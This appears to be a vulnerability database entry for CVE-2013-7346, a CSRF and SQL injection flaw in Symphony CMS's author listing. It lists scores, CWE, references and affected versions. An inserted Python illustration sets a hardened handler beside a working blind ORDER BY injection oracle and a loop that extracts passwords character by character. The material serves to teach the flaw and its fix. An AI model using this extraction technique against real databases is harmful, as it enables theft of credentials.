Vulnerability Details : CVE-2013-7346
Cross-site request forgery (CSRF) vulnerability in Symphony CMS before 2.3.2 allows remote attackers to hijack the authentication of administrators for requests that conduct SQL injection attacks via the sort parameter to system/authors/, related to CVE-2013-2559.
Vulnerability category: SQL Injection; Cross-site request forgery (CSRF)
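The description above combines two weaknesses: the admin listing at system/authors/ drops the untrusted sort parameter into the query (SQL injection, CVE-2013-2559), and nothing ties the request to the admin's intent, so a page the admin merely visits can make the browser issue it with the session cookie attached (CSRF). The following is an added illustrative model of that bug class, not Symphony CMS code: the table, row values, handler names, the CASE-based blind payload and the token handling are all constructed for this example. It shows the vulnerable handler beside a hardened one, and why an ORDER BY injection is enough to read data even when the response shows nothing but the row order.

```python
"""Illustrative model of the CVE-2013-7346 bug class (constructed example)."""
import hmac
import secrets
import sqlite3

# Constructed stand-in for an authors table. Usernames are chosen so that
# ordering by id and ordering by username give different row orders.
_SCHEMA = """
CREATE TABLE authors (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO authors VALUES (1, 'zed', 'hash_a');
INSERT INTO authors VALUES (2, 'amy', 'hash_b');
"""

# Columns the listing legitimately supports sorting by (the allow-list).
SORT_COLUMNS = frozenset({"id", "username"})


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def list_authors_vulnerable(conn, sort):
    """Before: `sort` is interpolated verbatim and no CSRF token is required."""
    rows = conn.execute(f"SELECT username FROM authors ORDER BY {sort}").fetchall()
    return [r[0] for r in rows]


def list_authors_hardened(conn, sort, session_token, request_token):
    """After: reject forged cross-site requests, then reject unknown sort columns."""
    # CSRF: the request must carry the per-session token; compare in constant time.
    if not (session_token and request_token
            and hmac.compare_digest(session_token, request_token)):
        raise PermissionError("missing or invalid CSRF token")
    # Injection: column names cannot be bound as query parameters, so an
    # allow-list of identifiers is the control; only those reach the SQL text.
    if sort not in SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort!r}")
    rows = conn.execute(f"SELECT username FROM authors ORDER BY {sort}").fetchall()
    return [r[0] for r in rows]


def attempt_hardened(conn, sort, session_token, request_token):
    """Wrap the hardened handler so a rejection is a return value, not a crash."""
    try:
        return ("ok", list_authors_hardened(conn, sort, session_token, request_token))
    except (PermissionError, ValueError) as exc:
        return ("rejected", type(exc).__name__)


def ordering_oracle(conn, condition_sql):
    """One bit per request: the row order of the response reveals whether an
    attacker-chosen subquery is true. No error and no extra data are shown,
    which is what makes an ORDER BY injection usable blind."""
    sort = f"CASE WHEN ({condition_sql}) THEN id ELSE username END"
    return list_authors_vulnerable(conn, sort) == list_authors_vulnerable(conn, "id")


def leak_password(conn, target_id, alphabet="abcdefghijklmnopqrstuvwxyz_", max_len=64):
    """Recover one row's password column character by character via the oracle."""
    recovered = ""
    while len(recovered) < max_len:
        for ch in alphabet:
            guess = recovered + ch
            cond = (f"(SELECT substr(password, 1, {len(guess)}) FROM authors "
                    f"WHERE id = {target_id}) = '{guess}'")
            if ordering_oracle(conn, cond):
                recovered = guess
                break
        else:
            break  # no alphabet character extends the prefix: end of string
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Forged request from a third-party page: the admin's cookie rides along,
    # but the attacker cannot supply the session token.
    print("vulnerable handler leaks:", leak_password(db, 1))
    token = secrets.token_hex(16)
    print("hardened, forged (no token):", attempt_hardened(db, "username", token, None))
    print("hardened, genuine but injected sort:",
          attempt_hardened(db, "CASE WHEN 1 THEN id ELSE username END", token, token))
    print("hardened, genuine:", attempt_hardened(db, "username", token, token))
```

The two controls are independent and both are needed: the token check closes the cross-site path in the description (a forged request has no way to read the victim's token), and the allow-list closes the injection for a logged-in user or a leaked token. Parameter binding does not help here because ORDER BY takes an identifier, not a value.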
Exploit prediction scoring system (EPSS) score for CVE-2013-7346
Probability of exploitation activity in the next 30 days: 0.09%
Percentile (proportion of vulnerabilities scored at or below this one): ~37%
CVSS scores for CVE-2013-7346
Base Score | Base Severity | CVSS Vector (v2) | Exploitability Score | Impact Score | Score Source |
---|---|---|---|---|---|
6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P | 8.6 | 6.4 | NIST |
CWE ids for CVE-2013-7346
- CWE-352 (Cross-Site Request Forgery): The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. Assigned by: nvd@nist.gov (Primary)
References for CVE-2013-7346
- http://archives.neohapsis.com/archives/bugtraq/2013-04/0018.html (Exploit)
- https://www.htbridge.com/advisory/HTB23148 : SQL Injection Vulnerability in Symphony - HTB23148 Security Advisory | ImmuniWeb (Exploit)
Products affected by CVE-2013-7346
- cpe:2.3:a:getsymphony:symphony:*:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.6:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.3:*:*:*:*:*:*:*
- cpe:2.3:a:getsymphony:symphony:2.1.0:*:*:*:*:*:*:*